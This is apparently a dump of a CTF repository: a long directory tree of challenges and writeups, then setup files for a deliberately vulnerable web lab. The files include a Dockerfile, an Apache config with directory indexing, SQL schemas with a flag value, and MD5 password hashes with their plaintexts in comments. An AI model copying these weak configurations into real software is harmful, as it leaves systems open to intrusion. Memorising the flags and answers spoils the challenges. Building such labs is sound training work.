│ │ │ │ │ │ └── DecompileIt.jar │ │ │ │ │ └── docompile me │ │ │ │ │ │ ├── DecompileIt.jar │ │ │ │ │ │ └── info.json │ │ │ │ └── 30pt- useless │ │ │ │ │ ├── info.txt │ │ │ │ │ └── useless │ │ │ │ │ ├── binary │ │ │ │ │ └── info.json │ │ │ ├── Steg │ │ │ │ ├── 40pt- funny messaging │ │ │ │ │ ├── create.py │ │ │ │ │ ├── funny messaging │ │ │ │ │ │ ├── info.json │ │ │ │ │ │ └── secret.dat │ │ │ │ │ ├── info.txt │ │ │ │ │ └── secret.dat │ │ │ │ └── 50pt- hidden secret │ │ │ │ │ ├── Resources │ │ │ │ │ ├── pass.txt │ │ │ │ │ ├── sample.jpg │ │ │ │ │ ├── sample.wav │ │ │ │ │ └── secret.txt │ │ │ │ │ ├── hidden secret │ │ │ │ │ ├── file │ │ │ │ │ └── info.json │ │ │ │ │ └── info.txt │ │ │ └── Web │ │ │ │ ├── 20pt- do you know how to debug │ │ │ │ ├── do you know how to debug │ │ │ │ │ └── info.json │ │ │ │ ├── flag.txt │ │ │ │ ├── info.txt │ │ │ │ └── project │ │ │ │ │ ├── .idea │ │ │ │ │ ├── dataSources.ids │ │ │ │ │ ├── dataSources.local.xml │ │ │ │ │ ├── dataSources.xml │ │ │ │ │ ├── encodings.xml │ │ │ │ │ ├── misc.xml │ │ │ │ │ ├── modules.xml │ │ │ │ │ ├── project.iml │ │ │ │ │ ├── scopes │ │ │ │ │ │ └── scope_settings.xml │ │ │ │ │ ├── vcs.xml │ │ │ │ │ └── workspace.xml │ │ │ │ │ ├── app │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── __init__.pyc │ │ │ │ │ ├── admin.py │ │ │ │ │ ├── admin.pyc │ │ │ │ │ ├── models.py │ │ │ │ │ ├── models.pyc │ │ │ │ │ ├── tests.py │ │ │ │ │ ├── views.py │ │ │ │ │ └── views.pyc │ │ │ │ │ ├── db.sqlite3 │ │ │ │ │ ├── manage.py │ │ │ │ │ ├── project │ │ │ │ │ ├── __init__.py │ │ │ │ │ ├── __init__.pyc │ │ │ │ │ ├── settings.py │ │ │ │ │ ├── settings.pyc │ │ │ │ │ ├── urls.py │ │ │ │ │ ├── urls.pyc │ │ │ │ │ ├── wsgi.py │ │ │ │ │ └── wsgi.pyc │ │ │ │ │ └── templates │ │ │ │ │ └── index.html │ │ │ │ ├── 40pt- make it collide │ │ │ │ ├── index.php │ │ │ │ ├── info.txt │ │ │ │ └── make it collide │ │ │ │ │ └── info.json │ │ │ │ └── 40pt- modern website │ │ │ │ ├── Sources │ │ │ │ ├── Store.php │ │ │ │ ├── Untitled-1.png │ │ │ │ ├── db-creds.inc │ │ │ │ ├── index.html │ │ │ │ ├── result.txt │ │ │ │ ├── setup.php │ │ │ │ ├── sql-connect.php │ │ │ │ └── style.css │ │ │ │ └── modern website │ │ │ │ └── info.json │ │ ├── 2- Medium │ │ │ ├── Crypto │ │ │ │ ├── 60pt- Custom Enc │ │ │ │ │ ├── custom enc │ │ │ │ │ │ ├── enc.py │ │ │ │ │ │ └── info.json │ │ │ │ │ ├── dec.py │ │ │ │ │ ├── enc.py │ │ │ │ │ └── info.txt │ │ │ │ └── 70pt- rsa2 │ │ │ │ │ ├── Solution │ │ │ │ │ ├── factor.log │ │ │ │ │ ├── out.pub │ │ │ │ │ ├── session.log │ │ │ │ │ └── solver.py │ │ │ │ │ ├── create.md │ │ │ │ │ ├── info.txt │ │ │ │ │ ├── out.key │ │ │ │ │ ├── rsa2 │ │ │ │ │ ├── info.json │ │ │ │ │ ├── msg.enc │ │ │ │ │ └── out.pub │ │ │ │ │ └── solver.py │ │ │ ├── Misc │ │ │ │ ├── 80pt- catch me if you can │ │ │ │ │ ├── Sources │ │ │ │ │ │ ├── !pd.nfo │ │ │ │ │ │ ├── Click.598-1395.10.19_p30download.com │ │ │ │ │ │ │ ├── !pd.nfo │ │ │ │ │ │ │ ├── pd.jpg │ │ │ │ │ │ │ ├── www.p30download.com.url │ │ │ │ │ │ │ └── www.p30forum.com.url │ │ │ │ │ │ ├── flag.txt │ │ │ │ │ │ ├── pd.jpg │ │ │ │ │ │ ├── www.p30download.com.url │ │ │ │ │ │ └── www.p30forum.com.url │ │ │ │ │ ├── catch me if you can │ │ │ │ │ │ ├── flag.zip │ │ │ │ │ │ └── info.json │ │ │ │ │ └── info.txt │ │ │ │ └── 80pt- crypted png │ │ │ │ │ └── crypted png │ │ │ │ │ ├── encrypt.py │ │ │ │ │ ├── flag_encrypted.png │ │ │ │ │ └── info.json │ │ │ ├── PPC │ │ │ │ └── 50pt- finding the truth │ │ │ │ │ └── finding the truth │ │ │ │ │ ├── encoding.py │ │ │ │ │ └── info.json │ │ │ ├── Reverse │ │ │ │ ├── 50pt- can you crack this │ │ │ │ │ ├── can you crack this │ │ │ │ │ │ ├── crackme │ │ │ │ │ │ └── info.json │ │ │ │ │ ├── crackme │ │ │ │ │ ├── crackme.c │ │ │ │ │ └── info.txt │ │ │ │ └── 60pt- password validator │ │ │ │ │ ├── Resources │ │ │ │ │ ├── clear.py │ │ │ │ │ ├── create.sh │ │ │ │ │ ├── desc.txt │ │ │ │ │ ├── generator.py │ │ │ │ │ ├── rev │ │ │ │ │ └── rev300.c │ │ │ │ │ ├── generator.py │ │ │ │ │ ├── info.txt │ │ │ │ │ ├── password validator │ │ │ │ │ ├── info.json │ │ │ │ │ └── rev │ │ │ │ │ ├── rev │ │ │ │ │ └── source.c │ │ │ ├── Steg │ │ │ │ └── 50pt- tricky but easy │ │ │ │ │ ├── flag.txt │ │ │ │ │ ├── info.txt │ │ │ │ │ ├── sample.jpg │ │ │ │ │ └── tricky but easy │ │ │ │ │ ├── hidden.jpg │ │ │ │ │ └── info.json │ │ │ └── Web │ │ │ │ ├── 50pt- i like serials │ │ │ │ ├── Sources │ │ │ │ │ ├── flag.php │ │ │ │ │ └── index.php │ │ │ │ ├── i like serials │ │ │ │ │ └── info.json │ │ │ │ ├── info.txt │ │ │ │ └── solve.php │ │ │ │ └── 70pt- old php │ │ │ │ ├── flag.php │ │ │ │ ├── index.php │ │ │ │ ├── info.txt │ │ │ │ └── old php │ │ │ │ └── info.json │ │ └── 3- Harder │ │ │ ├── Network │ │ │ └── do the impossible │ │ │ │ ├── Q11.json │ │ │ │ ├── Q11_TOR_TXT.txt │ │ │ │ ├── Q11_Web_application │ │ │ │ ├── Q11_TOR_TXT.txt │ │ │ │ └── Q11_Web_application │ │ │ │ │ └── html │ │ │ │ │ ├── css │ │ │ │ │ ├── base.css │ │ │ │ │ ├── demo.css │ │ │ │ │ ├── font-awesome │ │ │ │ │ │ ├── css │ │ │ │ │ │ │ ├── font-awesome.css │ │ │ │ │ │ │ └── font-awesome.min.css │ │ │ │ │ │ └── fonts │ │ │ │ │ │ │ ├── FontAwesome.otf │ │ │ │ │ │ │ ├── fontawesome-webfont.eot │ │ │ │ │ │ │ ├── fontawesome-webfont.svg │ │ │ │ │ │ │ ├── fontawesome-webfont.ttf │ │ │ │ │ │ │ └── fontawesome-webfont.woff │ │ │ │ │ ├── fonts.css │ │ │ │ │ ├── main.css │ │ │ │ │ └── vendor.css │ │ │ │ │ ├── favicon.png │ │ │ │ │ ├── fonts │ │ │ │ │ └── roboto │ │ │ │ │ │ ├── roboto-black-webfont.eot │ │ │ │ │ │ ├── roboto-black-webfont.svg │ │ │ │ │ │ ├── roboto-black-webfont.ttf │ │ │ │ │ │ ├── roboto-black-webfont.woff │ │ │ │ │ │ ├── roboto-black-webfont.woff2 │ │ │ │ │ │ ├── roboto-blackitalic-webfont.eot │ │ │ │ │ │ ├── roboto-blackitalic-webfont.svg │ │ │ │ │ │ ├── roboto-blackitalic-webfont.ttf │ │ │ │ │ │ ├── roboto-blackitalic-webfont.woff │ │ │ │ │ │ ├── roboto-blackitalic-webfont.woff2 │ │ │ │ │ │ ├── roboto-bold-webfont.eot │ │ │ │ │ │ ├── roboto-bold-webfont.svg │ │ │ │ │ │ ├── roboto-bold-webfont.ttf │ │ │ │ │ │ ├── roboto-bold-webfont.woff │ │ │ │ │ │ ├── roboto-bold-webfont.woff2 │ │ │ │ │ │ ├── roboto-bolditalic-webfont.eot │ │ │ │ │ │ ├── roboto-bolditalic-webfont.svg │ │ │ │ │ │ ├── roboto-bolditalic-webfont.ttf │ │ │ │ │ │ ├── roboto-bolditalic-webfont.woff │ │ │ │ │ │ ├── roboto-bolditalic-webfont.woff2 │ │ │ │ │ │ ├── roboto-italic-webfont.eot │ │ │ │ │ │ ├── roboto-italic-webfont.svg │ │ │ │ │ │ ├── roboto-italic-webfont.ttf │ │ │ │ │ │ ├── roboto-italic-webfont.woff │ │ │ │ │ │ ├── roboto-italic-webfont.woff2 │ │ │ │ │ │ ├── roboto-light-webfont.eot │ │ │ │ │ │ ├── roboto-light-webfont.svg │ │ │ │ │ │ ├── roboto-light-webfont.ttf │ │ │ │ │ │ ├── roboto-light-webfont.woff │ │ │ │ │ │ ├── roboto-light-webfont.woff2 │ │ │ │ │ │ ├── roboto-lightitalic-webfont.eot │ │ │ │ │ │ ├── roboto-lightitalic-webfont.svg │ │ │ │ │ │ ├── roboto-lightitalic-webfont.ttf │ │ │ │ │ │ ├── roboto-lightitalic-webfont.woff │ │ │ │ │ │ ├── roboto-lightitalic-webfont.woff2 │ │ │ │ │ │ ├── roboto-medium-webfont.eot │ │ │ │ │ │ ├── roboto-medium-webfont.svg │ │ │ │ │ │ ├── roboto-medium-webfont.ttf │ │ │ │ │ │ ├── roboto-medium-webfont.woff │ │ │ │ │ │ ├── roboto-medium-webfont.woff2 │ │ │ │ │ │ ├── roboto-mediumitalic-webfont.eot │ │ │ │ │ │ ├── roboto-mediumitalic-webfont.svg │ │ │ │ │ │ ├── roboto-mediumitalic-webfont.ttf │ │ │ │ │ │ ├── roboto-mediumitalic-webfont.woff │ │ │ │ │ │ ├── roboto-mediumitalic-webfont.woff2 │ │ │ │ │ │ ├── roboto-regular-webfont.eot │ │ │ │ │ │ ├── roboto-regular-webfont.svg │ │ │ │ │ │ ├── roboto-regular-webfont.ttf │ │ │ │ │ │ ├── roboto-regular-webfont.woff │ │ │ │ │ │ ├── roboto-regular-webfont.woff2 │ │ │ │ │ │ ├── roboto-thin-webfont.eot │ │ │ │ │ │ ├── roboto-thin-webfont.svg │ │ │ │ │ │ ├── roboto-thin-webfont.ttf │ │ │ │ │ │ ├── roboto-thin-webfont.woff │ │ │ │ │ │ ├── roboto-thin-webfont.woff2 │ │ │ │ │ │ ├── roboto-thinitalic-webfont.eot │ │ │ │ │ │ ├── roboto-thinitalic-webfont.svg │ │ │ │ │ │ ├── roboto-thinitalic-webfont.ttf │ │ │ │ │ │ ├── roboto-thinitalic-webfont.woff │ │ │ │ │ │ ├── roboto-thinitalic-webfont.woff2 │ │ │ │ │ │ └── stylesheet.css │ │ │ │ │ ├── images │ │ │ │ │ ├── demo │ │ │ │ │ │ ├── demo-particles.jpg │ │ │ │ │ │ ├── demo-slideshow.jpg │ │ │ │ │ │ └── demo-static.jpg │ │ │ │ │ ├── main-logo.png │ │ │ │ │ └── slides │ │ │ │ │ │ ├── dandelion.jpg │ │ │ │ │ │ ├── greens.jpg │ │ │ │ │ │ └── woods.jpg │ │ │ │ │ ├── index.html │ │ │ │ │ ├── js │ │ │ │ │ ├── jquery-2.1.3.min.js │ │ │ │ │ ├── main.js │ │ │ │ │ ├── modernizr.js │ │ │ │ │ └── plugins.js │ │ │ │ │ └── readme.txt │ │ │ │ └── do the impossible │ │ │ │ └── info.json │ │ │ ├── PPC & Crypto │ │ │ └── 90pt- hash factory │ │ │ │ ├── hash factory │ │ │ │ └── info.json │ │ │ │ └── server.py │ │ │ ├── PPC & Web │ │ │ └── 100pt- I hate captchas │ │ │ │ ├── Challenge │ │ │ │ ├── captcha.php │ │ │ │ ├── check.php │ │ │ │ └── index.php │ │ │ │ ├── i hate captchas │ │ │ │ └── info.json │ │ │ │ ├── info.txt │ │ │ │ └── solve │ │ │ │ ├── captcha.png │ │ │ │ ├── out.txt │ │ │ │ ├── output.png │ │ │ │ ├── output2.png │ │ │ │ └── solve.py │ │ │ ├── Steg │ │ │ ├── 80pt- SLSB │ │ │ │ ├── README.md │ │ │ │ ├── Resources │ │ │ │ │ ├── LSBDecrypter.py │ │ │ │ │ ├── LSBEncrypter.py │ │ │ │ │ ├── README.md │ │ │ │ │ ├── lsb.bmp │ │ │ │ │ └── lsb1.bmp │ │ │ │ ├── SLSBDecrypter.py │ │ │ │ ├── SLSBEncrypter.py │ │ │ │ ├── info.txt │ │ │ │ ├── lsb.bmp │ │ │ │ ├── lsb1.bmp │ │ │ │ └── slsb │ │ │ │ │ ├── file.bmp │ │ │ │ │ └── info.json │ │ │ └── 80pt- secret channel │ │ │ │ ├── create.py │ │ │ │ ├── flag.jpg │ │ │ │ ├── for.pcapng │ │ │ │ ├── info.txt │ │ │ │ └── secret channel │ │ │ │ ├── info.json │ │ │ │ └── secret.pcapng │ │ │ └── Web │ │ │ └── my awesome shop │ │ │ ├── Challenge Sources.zip │ │ │ ├── Challenge Sources │ │ │ ├── local-admin-server │ │ │ │ ├── .idea │ │ │ │ │ ├── flask.iml │ │ │ │ │ ├── misc.xml │ │ │ │ │ ├── modules.xml │ │ │ │ │ └── workspace.xml │ │ │ │ ├── app.py │ │ │ │ └── templates │ │ │ │ │ ├── comment.html │ │ │ │ │ ├── comments.html │ │ │ │ │ └── index.html │ │ │ └── shop-server │ │ │ │ ├── .idea │ │ │ │ ├── .name │ │ │ │ ├── dataSources.ids │ │ │ │ ├── dataSources.local.xml │ │ │ │ ├── dataSources.xml │ │ │ │ ├── dataSources │ │ │ │ │ └── 81ea6526-dc6b-410a-8865-bcfe154bc2f8.xml │ │ │ │ ├── deployment.xml │ │ │ │ ├── encodings.xml │ │ │ │ ├── misc.xml │ │ │ │ ├── modules.xml │ │ │ │ ├── project.iml │ │ │ │ ├── scopes │ │ │ │ │ └── scope_settings.xml │ │ │ │ ├── vcs.xml │ │ │ │ ├── webServers.xml │ │ │ │ └── workspace.xml │ │ │ │ ├── app │ │ │ │ ├── __init__.py │ │ │ │ ├── admin.py │ │ │ │ ├── forms.py │ │ │ │ ├── models.py │ │ │ │ ├── tests.py │ │ │ │ └── views.py │ │ │ │ ├── comments │ │ │ │ ├── __init__.py │ │ │ │ ├── admin.py │ │ │ │ ├── models.py │ │ │ │ ├── tests.py │ │ │ │ ├── urls.py │ │ │ │ └── views.py │ │ │ │ ├── manage.py │ │ │ │ ├── project │ │ │ │ ├── __init__.py │ │ │ │ ├── settings.py │ │ │ │ ├── urls.py │ │ │ │ └── wsgi.py │ │ │ │ ├── shop │ │ │ │ ├── __init__.py │ │ │ │ ├── admin.py │ │ │ │ ├── models.py │ │ │ │ ├── tests.py │ │ │ │ ├── urls.py │ │ │ │ └── views.py │ │ │ │ └── templates │ │ │ │ ├── comments │ │ │ │ └── view.html │ │ │ │ ├── index.html │ │ │ │ ├── login.html │ │ │ │ ├── register.html │ │ │ │ └── shop │ │ │ │ └── index.html │ │ │ ├── bot.py │ │ │ ├── django-shop │ │ │ ├── django-shop1.zip │ │ │ ├── django-shop1 │ │ │ │ ├── info.json │ │ │ │ └── source.zip │ │ │ ├── django-shop2.zip │ │ │ └── django-shop2 │ │ │ │ └── info.json │ │ │ ├── flask-3pt │ │ │ ├── .idea │ │ │ │ ├── flask.iml │ │ │ │ ├── misc.xml │ │ │ │ ├── modules.xml │ │ │ │ └── workspace.xml │ │ │ ├── app.py │ │ │ └── templates │ │ │ │ ├── comment.html │ │ │ │ ├── comments.html │ │ │ │ └── index.html │ │ │ ├── flask │ │ │ ├── .idea │ │ │ │ ├── flask.iml │ │ │ │ ├── misc.xml │ │ │ │ ├── modules.xml │ │ │ │ └── workspace.xml │ │ │ ├── app.py │ │ │ └── templates │ │ │ │ ├── comment.html │ │ │ │ ├── comments.html │ │ │ │ └── index.html │ │ │ ├── ghostdriver.log │ │ │ ├── info.txt │ │ │ ├── project │ │ │ ├── .idea │ │ │ │ ├── .name │ │ │ │ ├── dataSources.ids │ │ │ │ ├── dataSources.local.xml │ │ │ │ ├── dataSources.xml │ │ │ │ ├── dataSources │ │ │ │ │ └── 81ea6526-dc6b-410a-8865-bcfe154bc2f8.xml │ │ │ │ ├── deployment.xml │ │ │ │ ├── encodings.xml │ │ │ │ ├── misc.xml │ │ │ │ ├── modules.xml │ │ │ │ ├── project.iml │ │ │ │ ├── scopes │ │ │ │ │ └── scope_settings.xml │ │ │ │ ├── vcs.xml │ │ │ │ ├── webServers.xml │ │ │ │ └── workspace.xml │ │ │ ├── app │ │ │ │ ├── __init__.py │ │ │ │ ├── __init__.pyc │ │ │ │ ├── admin.py │ │ │ │ ├── admin.pyc │ │ │ │ ├── forms.py │ │ │ │ ├── forms.pyc │ │ │ │ ├── migrations │ │ │ │ │ ├── 0001_initial.py │ │ │ │ │ ├── 0001_initial.pyc │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── __init__.pyc │ │ │ │ ├── models.py │ │ │ │ ├── models.pyc │ │ │ │ ├── tests.py │ │ │ │ ├── views.py │ │ │ │ └── views.pyc │ │ │ ├── comments │ │ │ │ ├── __init__.py │ │ │ │ ├── __init__.pyc │ │ │ │ ├── admin.py │ │ │ │ ├── admin.pyc │ │ │ │ ├── migrations │ │ │ │ │ ├── 0001_initial.py │ │ │ │ │ ├── 0001_initial.pyc │ │ │ │ │ ├── __init__.py │ │ │ │ │ └── __init__.pyc │ │ │ │ ├── models.py │ │ │ │ ├── models.pyc │ │ │ │ ├── tests.py │ │ │ │ ├── urls.py │ │ │ │ ├── urls.pyc │ │ │ │ ├── views.py │ │ │ │ └── views.pyc │ │ │ ├── db.sqlite3 │ │ │ ├── manage.py │ │ │ ├── project │ │ │ │ ├── __init__.py │ │ │ │ ├── __init__.pyc │ │ │ │ ├── settings.py │ │ │ │ ├── settings.pyc │ │ │ │ ├── urls.py │ │ │ │ ├── urls.pyc │ │ │ │ ├── wsgi.py │ │ │ │ └── wsgi.pyc │ │ │ ├── shop │ │ │ │ ├── __init__.py │ │ │ │ ├── __init__.pyc │ │ │ │ ├── admin.py │ │ │ │ ├── admin.pyc │ │ │ │ ├── models.py │ │ │ │ ├── models.pyc │ │ │ │ ├── tests.py │ │ │ │ ├── urls.py │ │ │ │ ├── urls.pyc │ │ │ │ ├── views.py │ │ │ │ └── views.pyc │ │ │ └── templates │ │ │ │ ├── comments │ │ │ │ └── view.html │ │ │ │ ├── index.html │ │ │ │ ├── login.html │ │ │ │ ├── register.html │ │ │ │ └── shop │ │ │ │ └── index.html │ │ │ └── solution.md │ └── README.md └── README.md ├── LICENSE ├── Online-CTF ├── adventofcode.com Writeups │ ├── day1 │ │ ├── 1.py │ │ └── 2.py │ ├── day2 │ │ ├── 1.py │ │ └── 2.py │ └── day4 │ │ └── 1.py ├── pwnable.kr-writeups │ └── Toddler's Bottle │ │ ├── bof │ │ ├── bof │ │ ├── bof.c │ │ ├── readme.md │ │ └── solve.py │ │ └── fd │ │ ├── fd.c │ │ └── readme.md ├── ringzer0team.com │ └── coding │ │ ├── 1-hash_me_if_you_can │ │ ├── README.md │ │ └── solver.py │ │ ├── 10-read_me_if_you_can │ │ ├── README.md │ │ ├── captcha.png │ │ └── solver.py │ │ ├── 11-hash_breaker_reloaded_again │ │ ├── README.md │ │ └── solver.py │ │ ├── 12-ascii_art │ │ ├── README.md │ │ └── solver.py │ │ ├── 3-hash_me_again │ │ ├── README.md │ │ └── solver.py │ │ ├── 4-i_hate_mathematics │ │ ├── README.md │ │ └── solver.py │ │ ├── 6-hash_breaker │ │ ├── README.md │ │ └── solver.py │ │ └── 8-hash_breaker_reloaded │ │ ├── README.md │ │ └── solver.py └── root-me │ └── programming │ └── 1-go_back_to_college │ ├── README.md │ └── solver.py ├── README.md ├── Wiki └── README.md └── Writeups ├── 2015 ├── hack.dat.kiwi │ ├── README.md │ ├── gaychal │ │ └── README.md │ └── phonelock1 │ │ └── README.md └── seccon │ ├── Command-line Quiz │ └── README.md │ └── SecconWars │ ├── README.md │ └── images │ ├── steg-1.jpg │ └── steg-2.jpg ├── 2016 ├── Plaid │ ├── morset │ │ ├── solver.py │ │ └── test.py │ ├── rabbit │ │ ├── rabbit.py │ │ ├── solver.py │ │ ├── solver2.py │ │ ├── util.py │ │ └── util.pyc │ └── tonnerre │ │ └── database.dump ├── SharifCTF │ ├── Bsniff │ │ └── README.md │ ├── Cryp1 │ │ ├── Ciphertext │ │ └── README.md │ ├── For2-dumped │ │ └── README.md │ ├── Web3-oldpersian │ │ ├── README.md │ │ ├── images │ │ │ ├── captcha_main.jpg │ │ │ ├── main_page.jpg │ │ │ ├── sample_1.jpg │ │ │ ├── sample_2.jpg │ │ │ ├── sample_3.jpg │ │ │ ├── sample_4.jpg │ │ │ └── trans.png │ │ └── solver.py │ └── jareCaptcha │ │ └── README.md ├── abctf │ ├── cryptography │ │ └── yummy │ │ │ ├── baconian.bmp │ │ │ └── solver.py │ └── programming │ │ ├── Slime Season 3 │ │ ├── solver.c │ │ └── solver.py │ │ ├── TGIF │ │ ├── date.txt │ │ └── solver.py │ │ ├── qset │ │ ├── __init__.py │ │ ├── interpreter.py │ │ ├── interpreter.pyc │ │ └── solver.py │ │ ├── racecar │ │ ├── input.txt │ │ └── solver.py │ │ └── the big kahuna │ │ ├── solver.cc │ │ └── solver.py ├── pwn2win │ ├── Tokens │ │ └── README.md │ └── sequences │ │ └── README.md ├── sCTF │ ├── Algorithmic │ │ └── Tracking │ │ │ ├── README.md │ │ │ ├── description.txt │ │ │ ├── info │ │ │ ├── raw_data.dat │ │ │ ├── solver.py │ │ │ └── tracking.in │ └── cryptography │ │ ├── Verticode │ │ ├── README.md │ │ ├── code1.png │ │ ├── description │ │ ├── image.png │ │ └── solver.py │ │ └── Vertinet │ │ ├── README.md │ │ ├── description │ │ ├── image.png │ │ └── solver.py └── tuctf │ ├── crypt │ ├── magic-image │ │ ├── encrypt.py │ │ ├── encrypted.png │ │ ├── output.png │ │ └── solver.py │ └── neverending │ │ └── solver.py │ └── misc │ └── the nack │ ├── README.md │ ├── file.pcapng │ ├── output.gif │ └── solver.py ├── 2018 └── BSides Delhi CTF │ ├── Crypt100-TileMate │ ├── README.md │ ├── ci.pher.text │ ├── encrypt.py │ └── solver.py │ └── Web200 │ └── README.md ├── 2021 ├── CSAW │ ├── Warmup │ │ ├── Warmup.py │ │ ├── output.txt │ │ └── solve.py │ ├── crack me │ │ └── README.md │ ├── exploit1 │ │ ├── password_checker │ │ └── solve.py │ └── web1 │ │ └── solve.txt ├── TMUCTF │ └── Pwn │ │ └── Security Code │ │ ├── README.md │ │ ├── flag.txt │ │ ├── images │ │ ├── 1.jpg │ │ ├── 2.jpg │ │ └── 3.jpg │ │ ├── securitycode │ │ └── solve.py ├── hxp │ └── misc │ │ └── Log 4 sanity check │ │ ├── Dockerfile │ │ ├── Vuln.class │ │ ├── docker-stuff │ │ └── readflag │ │ ├── log4j-api-2.14.1.jar │ │ ├── log4j-core-2.14.1.jar │ │ ├── log4j2.xml │ │ ├── readme.md │ │ ├── run.sh │ │ └── ynetd └── seccon │ └── average │ ├── average │ ├── average.c │ ├── libc.so.6 │ └── solve.py ├── 2024 ├── ASIS Quals │ ├── Detic │ │ ├── README.md │ │ ├── requirements.txt │ │ └── solve.py │ ├── README.md │ └── Snoopy │ │ ├── README.md │ │ ├── images │ │ ├── image1.png │ │ ├── image2.png │ │ ├── image3.png │ │ └── image4.png │ │ ├── packets.txt │ │ ├── snoopy.pcap │ │ └── solve.py ├── BuckeyeCTF │ ├── SSFS │ │ ├── images │ │ │ └── image1.png │ │ ├── readme.md │ │ └── source │ │ │ ├── Dockerfile │ │ │ ├── app.py │ │ │ ├── flag.txt │ │ │ ├── requirements.txt │ │ │ ├── static │ │ │ └── css │ │ │ │ └── style.css │ │ │ └── templates │ │ │ └── index.html │ ├── color │ │ ├── readme.md │ │ ├── solve.py │ │ └── source │ │ │ ├── Dockerfile │ │ │ ├── Makefile │ │ │ ├── color │ │ │ └── color.c │ ├── donut │ │ ├── readme.md │ │ └── solve.py │ ├── gitgoo │ │ └── readme.md │ ├── quotes │ │ ├── readme.md │ │ └── source │ │ │ ├── Dockerfile │ │ │ ├── README.md │ │ │ ├── app.js │ │ │ ├── package.json │ │ │ ├── pnpm-lock.yaml │ │ │ └── quotes │ ├── readme.md │ ├── reduce_cycle │ │ ├── png_header.bin │ │ └── readme.md │ ├── rsa │ │ ├── readme.md │ │ ├── rsa.py │ │ └── solve.py │ ├── runway0 │ │ ├── readme.md │ │ └── source │ │ │ ├── Dockerfile │ │ │ ├── Makefile │ │ │ ├── docker-compose.yaml │ │ │ ├── flag.txt │ │ │ ├── runway0 │ │ │ └── runway0.c │ ├── runway1 │ │ ├── readme.md │ │ └── source │ │ │ ├── Dockerfile │ │ │ ├── Makefile │ │ │ ├── docker-compose.yaml │ │ │ ├── flag.txt │ │ │ ├── runway1 │ │ │ └── runway1.c │ ├── runway2 │ │ ├── solve.py │ │ └── source │ │ │ ├── Dockerfile │ │ │ ├── Makefile │ │ │ ├── docker-compose.yaml │ │ │ ├── flag.txt │ │ │ ├── runway2 │ │ │ └── runway2.c │ ├── runway3 │ │ ├── solve.py │ │ └── source │ │ │ ├── Dockerfile │ │ │ ├── Makefile │ │ │ ├── docker-compose.yaml │ │ │ ├── flag.txt │ │ │ ├── runway3 │ │ │ └── runway3.c │ ├── the_CIA │ │ ├── _protected-cia-document.pdf.extracted │ │ │ ├── 1C749 │ │ │ └── 1C749.zlib │ │ └── protected-cia-document.pdf │ ├── wreck │ │ ├── binwalk.txt │ │ ├── output.jpg │ │ └── readme.md │ └── xnor │ │ ├── solve.py │ │ ├── xnor.py │ │ └── xnor_output.txt └── Questcon │ ├── Web4 - WhoIAM │ └── solve.md │ ├── web1 - Direction │ └── solve.md │ ├── web2 - Theadmin │ └── solve.md │ └── web3 - Temp │ └── solve.md ├── LICENSE └── README.md /Challenges/BinaryCodes/Web/easy-lfi1/app/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/easy-lfi1/app/favicon.ico -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/easy-lfi1/app/pages/page.php: -------------------------------------------------------------------------------- 1 | 5 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/easy-lfi1/app/somerandomtext/flag.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/hard-ssrf1/cgi-edge/public_html/test.html: -------------------------------------------------------------------------------- 1 |

hello!

2 | world 3 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/hard-ssrf1/php-flag/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM linode/lamp 2 | 3 | MAINTAINER Execut3 4 | 5 | RUN apt-get update; apt-get install php5-mysql git -y 6 | 7 | ADD html /var/www/html 8 | ADD data/db /db 9 | ADD start.sh /start.sh 10 | ADD apache /etc/apache2/sites-enabled 11 | CMD ["bash", "/start.sh"] 12 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/hard-ssrf1/php-flag/apache/000-default.conf: -------------------------------------------------------------------------------- 1 | 2 | DocumentRoot /var/www/html 3 | 4 | Options Indexes 5 | Require all granted 6 | 7 | ErrorLog ${APACHE_LOG_DIR}/error.log 8 | CustomLog ${APACHE_LOG_DIR}/access.log combined 9 | 10 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/hard-ssrf1/php-flag/data/data: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Execut3/CTF/7d6d69a9b37a5184566f9d15bad05d0e68060260/Challenges/BinaryCodes/Web/hard-ssrf1/php-flag/data/data -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/hard-ssrf1/php-flag/data/db/board: -------------------------------------------------------------------------------- 1 | create table board ( 2 | id integer not null primary key auto_increment, 3 | author text, 4 | content text 5 | ); 6 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/hard-ssrf1/php-flag/data/db/data: -------------------------------------------------------------------------------- 1 | create table data ( 2 | id integer not null primary key auto_increment, 3 | owner_id integer, 4 | data_name text, 5 | data_content text 6 | ); 7 | 8 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/hard-ssrf1/php-flag/data/db/flag: -------------------------------------------------------------------------------- 1 | create table flag (flag text); 2 | insert into flag values ('flag_6d39cacfac640042eb39113aacaa7493'); -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/hard-ssrf1/php-flag/data/db/log: -------------------------------------------------------------------------------- 1 | create table log ( 2 | id integer not null primary key auto_increment, 3 | content text 4 | ); 5 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/hard-ssrf1/php-flag/data/db/users: -------------------------------------------------------------------------------- 1 | create table users ( 2 | id integer not null primary key auto_increment, 3 | username text, 4 | password text 5 | ); 6 | insert into users values (null, 'admin', 'c3623b470852f6d889a9d3af7214becc'); -- somethingstrange 7 | insert into users values (null, 'reza', '5d41402abc4b2a76b9719d911017c592'); -- hello 8 | 9 | -------------------------------------------------------------------------------- /Challenges/BinaryCodes/Web/medium-race1/README.md: -------------------------------------------------------------------------------- 1 | # Initiate: 2 | ```bash 3 | docker run -it -p 10000:80 -v "$(pwd)":/var/www/site ctf/race1 bash 4 | service mysql start 5 | service apache2 start 6 | ``` 7 | visit setup.php, then corrupt setup.php that nobody can interact with it, 8 | and remove the flag section from the bottom of it. 9 | test a user register and login and done... -------------------------------------------------------------------------------- 